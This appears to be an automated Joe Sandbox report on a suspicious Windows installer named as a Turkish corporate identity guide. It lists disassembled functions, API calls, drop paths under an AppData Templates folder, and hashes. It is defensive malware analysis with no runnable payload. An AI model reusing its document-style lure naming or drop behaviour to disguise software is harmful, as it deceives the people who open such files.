                                                                                                                                                                                          • Opcode ID: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                                                                                                                                                                          • Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004039AA Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 366 4039aa-4039c2 call 406694 369 4039c4-4039d4 call 406201 366->369 370 4039d6-403a0d call 406188 366->370 378 403a30-403a59 call 403c80 call 405c97 369->378 374 403a25-403a2b lstrcatW 370->374 375 403a0f-403a20 call 406188 370->375 374->378 375->374 384 403aeb-403af3 call 405c97 378->384 385 403a5f-403a64 378->385 391 403b01-403b26 LoadImageW 384->391 392 403af5-403afc call 4062dc 384->392 385->384 386 403a6a-403a92 call 406188 385->386 386->384 395 403a94-403a98 386->395 393 403ba7-403baf call 40140b 391->393 394 403b28-403b58 RegisterClassW 391->394 392->391 408 403bb1-403bb4 393->408 409 403bb9-403bc4 call 403c80 393->409 397 403c76 394->397 398 403b5e-403ba2 SystemParametersInfoW CreateWindowExW 394->398 400 403aaa-403ab6 lstrlenW 395->400 401 403a9a-403aa7 call 405bbc 395->401 406 403c78-403c7f 397->406 398->393 402 403ab8-403ac6 lstrcmpiW 400->402 403 403ade-403ae6 call 405b8f call 4062ba 400->403 401->400 402->403 407 403ac8-403ad2 GetFileAttributesW 402->407 403->384 412 403ad4-403ad6 407->412 413 403ad8-403ad9 call 405bdb 407->413 408->406 419 403bca-403be4 ShowWindow call 406624 409->419 420 403c4d-403c55 call 4053f5 409->420 412->403 412->413 413->403 427 403bf0-403c02 GetClassInfoW 419->427 428 403be6-403beb call 406624 419->428 425 403c57-403c5d 420->425 426 403c6f-403c71 call 40140b 420->426 425->408 429 403c63-403c6a call 40140b 425->429 426->397 432 403c04-403c14 GetClassInfoW RegisterClassW 427->432 433 403c1a-403c3d DialogBoxParamW call 40140b 427->433 428->427 429->408 432->433 436 403c42-403c4b call 4038fa 433->436 436->406
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                            • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                          • lstrcatW.KERNEL32(1033,0042D248), ref: 00403A2B
                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403AAB
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403AC9
                                                                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula), ref: 00403B12
                                                                                                                                                                                            • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                                                                          • RegisterClassW.USER32(00433E80), ref: 00403B4F
                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
                                                                                                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
                                                                                                                                                                                          • RegisterClassW.USER32(00433E80), ref: 00403C14
                                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                          • API String ID: 1975747703-2054314548
                                                                                                                                                                                          • Opcode ID: 2904cd21c70d62866cc327d96625cdd9032e7e4c90c5b4ba07f750359117e74a
                                                                                                                                                                                          • Instruction ID: 9f2b94ab3f1de80a41c8f53b965b22801f2352f665cd6d3f8e6571e1d6c0b700
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2904cd21c70d62866cc327d96625cdd9032e7e4c90c5b4ba07f750359117e74a
                                                                                                                                                                                          • Instruction Fuzzy Hash: D861B9312407007ED720AF659D46E2B3A6CEB85B4AF40057FF945B51E2CBBD9941CB2D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 440 402edd-402f2b GetTickCount GetModuleFileNameW call 405db0 443 402f37-402f65 call 4062ba call 405bdb call 4062ba GetFileSize 440->443 444 402f2d-402f32 440->444 452 403052-403060 call 402e79 443->452 453 402f6b 443->453 445 40310f-403113 444->445 459 403062-403065 452->459 460 4030b5-4030ba 452->460 455 402f70-402f87 453->455 457 402f89 455->457 458 402f8b-402f94 call 403331 455->458 457->458 466 402f9a-402fa1 458->466 467 4030bc-4030c4 call 402e79 458->467 462 403067-40307f call 403347 call 403331 459->462 463 403089-4030b3 GlobalAlloc call 403347 call 403116 459->463 460->445 462->460 490 403081-403087 462->490 463->460 488 4030c6-4030d7 463->488 472 402fa3-402fb7 call 405d6b 466->472 473 40301d-403021 466->473 467->460 478 40302b-403031 472->478 487 402fb9-402fc0 472->487 477 403023-40302a call 402e79 473->477 473->478 477->478 484 403040-40304a 478->484 485 403033-40303d call 406787 478->485 484->455 489 403050 484->489 485->484 487->478 493 402fc2-402fc9 487->493 494 4030d9 488->494 495 4030df-4030e4 488->495 489->452 490->460 490->463 493->478 496 402fcb-402fd2 493->496 494->495 497 4030e5-4030eb 495->497 496->478 498 402fd4-402fdb 496->498 497->497 499 4030ed-403108 SetFilePointer call 405d6b 497->499 498->478 500 402fdd-402ffd 498->500 503 40310d 499->503 500->460 502 403003-403007 500->502 504 403009-40300d 502->504 505 40300f-403017 502->505 503->445 504->489 504->505 505->478 506 403019-40301b 505->506 506->478
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                                                                            • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                            • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                          • API String ID: 4283519449-3759343206
                                                                                                                                                                                          • Opcode ID: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                                                                                                                                          • Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                                                                                                                                          • Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004062DC Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 720 4062dc-4062e7 721 4062e9-4062f8 720->721 722 4062fa-406310 720->722 721->722 723 406316-406323 722->723 724 406528-40652e 722->724 723->724 725 406329-406330 723->725 726 406534-40653f 724->726 727 406335-406342 724->727 725->724 729 406541-406545 call 4062ba 726->729 730 40654a-40654b 726->730 727->726 728 406348-406354 727->728 731 406515 728->731 732 40635a-406398 728->732 729->730 736 406523-406526 731->736 737 406517-406521 731->737 734 4064b8-4064bc 732->734 735 40639e-4063a9 732->735 740 4064be-4064c4 734->740 741 4064ef-4064f3 734->741 738 4063c2 735->738 739 4063ab-4063b0 735->739 736->724 737->724 747 4063c9-4063d0 738->747 739->738 744 4063b2-4063b5 739->744 745 4064d4-4064e0 call 4062ba 740->745 746 4064c6-4064d2 call 406201 740->746 742 406502-406513 lstrlenW 741->742 743 4064f5-4064fd call 4062dc 741->743 742->724 743->742 744->738 749 4063b7-4063ba 744->749 758 4064e5-4064eb 745->758 746->758 751 4063d2-4063d4 747->751 752 4063d5-4063d7 747->752 749->738 754 4063bc-4063c0 749->754 751->752 756 406412-406415 752->756 757 4063d9-406400 call 406188 752->757 754->747 759 406425-406428 756->759 760 406417-406423 GetSystemDirectoryW 756->760 769 4064a0-4064a3 757->769 770 406406-40640d call 4062dc 757->770 758->742 762 4064ed 758->762 765 406493-406495 759->765 766 40642a-406438 GetWindowsDirectoryW 759->766 764 406497-40649b 760->764 763 4064b0-4064b6 call 40654e 762->763 763->742 764->763 771 40649d 764->771 765->764 768 40643a-406444 765->768 766->765 776 406446-406449 768->776 777 40645e-406474 SHGetSpecialFolderLocation 768->777 769->763 774 4064a5-4064ab lstrcatW 769->774 770->764 771->769 774->763 776->777 779 40644b-406452 776->779 780 406476-40648d SHGetPathFromIDListW CoTaskMemFree 777->780 781 40648f 777->781 782 40645a-40645c 779->782 780->764 780->781 781->765 782->764 782->777
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040641D
                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406430
                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00405359,0041DA00,00000000,0042C228,?,00405359,0042C228,00000000), ref: 0040646C
                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(0041DA00,Call), ref: 0040647A
                                                                                                                                                                                          • CoTaskMemFree.OLE32(0041DA00), ref: 00406485
                                                                                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406503
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                          • API String ID: 717251189-1230650788
                                                                                                                                                                                          • Opcode ID: be842abed2e65b63b3d72d51674aff3c14f059aabebd99e4c76d62d1777cce00
                                                                                                                                                                                          • Instruction ID: 29f0adb049bea166a756856afc1b7ff582c4fdfd81cc2e884c30b49282791dbd
                                                                                                                                                                                          • Opcode Fuzzy Hash: be842abed2e65b63b3d72d51674aff3c14f059aabebd99e4c76d62d1777cce00
                                                                                                                                                                                          • Instruction Fuzzy Hash: E6611071A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146,?,?,00000031), ref: 004017D5
                                                                                                                                                                                            • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Fjernbetjeningsenhedernes Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                            • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041DA00,76FC23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                            • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,76FC23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                            • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A), ref: 0040537D
                                                                                                                                                                                            • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsq53F5.tmp$C:\Users\user\AppData\Local\Temp\nsq53F5.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146$Call
                                                                                                                                                                                          • API String ID: 1941528284-2497160516
                                                                                                                                                                                          • Opcode ID: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
                                                                                                                                                                                          • Instruction ID: 24a82d921ca393d09b0f70664e9a68f54f64900ed4cc6ef124b6c19d11fe7a64
                                                                                                                                                                                          • Opcode Fuzzy Hash: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 12419371900518BACF107BA5DD46DAF3A79EF45368F20423FF422B10E1DA3C8A519A6D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403116 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 913 403116-40312d 914 403136-40313f 913->914 915 40312f 913->915 916 403141 914->916 917 403148-40314d 914->917 915->914 916->917 918 40315d-40316a call 403331 917->918 919 40314f-403158 call 403347 917->919 923 403170-403174 918->923 924 40331f 918->924 919->918 925 4032ca-4032cc 923->925 926 40317a-4031c3 GetTickCount 923->926 927 403321-403322 924->927 928 40330c-40330f 925->928 929 4032ce-4032d1 925->929 930 403327 926->930 931 4031c9-4031d1 926->931 932 40332a-40332e 927->932 935 403311 928->935 936 403314-40331d call 403331 928->936 929->930 937 4032d3 929->937 930->932 933 4031d3 931->933 934 4031d6-4031e4 call 403331 931->934 933->934 934->924 946 4031ea-4031f3 934->946 935->936 936->924 947 403324 936->947 940 4032d6-4032dc 937->940 943 4032e0-4032ee call 403331 940->943 944 4032de 940->944 943->924 950 4032f0-4032fc call 405e62 943->950 944->943 949 4031f9-403219 call 4067f5 946->949 947->930 955 4032c2-4032c4 949->955 956 40321f-403232 GetTickCount 949->956 957 4032c6-4032c8 950->957 958 4032fe-403308 950->958 955->927 959 403234-40323c 956->959 960 40327d-40327f 956->960 957->927 958->940 961 40330a 958->961 962 403244-40327a MulDiv wsprintfW call 405322 959->962 963 40323e-403242 959->963 964 403281-403285 960->964 965 4032b6-4032ba 960->965 961->930 962->960 963->960 963->962 966 403287-40328e call 405e62 964->966 967 40329c-4032a7 964->967 965->931 968 4032c0 965->968 973 403293-403295 966->973 971 4032aa-4032ae 967->971 968->930 971->949 974 4032b4 971->974 973->957 975 403297-40329a 973->975 974->930 975->971
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                                                                                          • String ID: ... %d%%$@
                                                                                                                                                                                          • API String ID: 551687249-3859443358
                                                                                                                                                                                          • Opcode ID: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                                                                                                                                                                          • Instruction ID: 5c504835c6c52170eea8577a9cac8da2a2598cbf1b76cdbdeb728d3f56fa2377
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                                                                                                                                                                          • Instruction Fuzzy Hash: AA517A71900219DBCB10DFA5DA84A9E7BB8AF04366F14417BEC14B72C0CB78DA40CBA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 976 40264a-402663 call 402c1f 979 402ac5-402ac8 976->979 980 402669-402670 976->980 983 402ace-402ad4 979->983 981 402672 980->981 982 402675-402678 980->982 981->982 984 4027dc-4027e4 982->984 985 40267e-40268d call 40621a 982->985 984->979 985->984 989 402693 985->989 990 402699-40269d 989->990 991 402732-402735 990->991 992 4026a3-4026be ReadFile 990->992 993 402737-40273a 991->993 994 40274d-40275d call 405e33 991->994 992->984 995 4026c4-4026c9 992->995 993->994 996 40273c-402747 call 405e91 993->996 994->984 1005 40275f 994->1005 995->984 998 4026cf-4026dd 995->998 996->984 996->994 1001 4026e3-4026f5 MultiByteToWideChar 998->1001 1002 402798-4027a4 call 406201 998->1002 1001->1005 1006 4026f7-4026fa 1001->1006 1002->983 1008 402762-402765 1005->1008 1009 4026fc-402707 1006->1009 1008->1002 1010 402767-40276c 1008->1010 1009->1008 1011 402709-40272e SetFilePointer MultiByteToWideChar 1009->1011 1012 4027a9-4027ad 1010->1012 1013 40276e-402773 1010->1013 1011->1009 1014 402730 1011->1014 1015 4027ca-4027d6 SetFilePointer 1012->1015 1016 4027af-4027b3 1012->1016 1013->1012 1017 402775-402788 1013->1017 1014->1005 1015->984 1018 4027b5-4027b9 1016->1018 1019 4027bb-4027c8 1016->1019 1017->984 1020 40278a-402790 1017->1020 1018->1015 1018->1019 1019->984 1020->990 1021 402796 1020->1021 1021->984
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                                                            • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
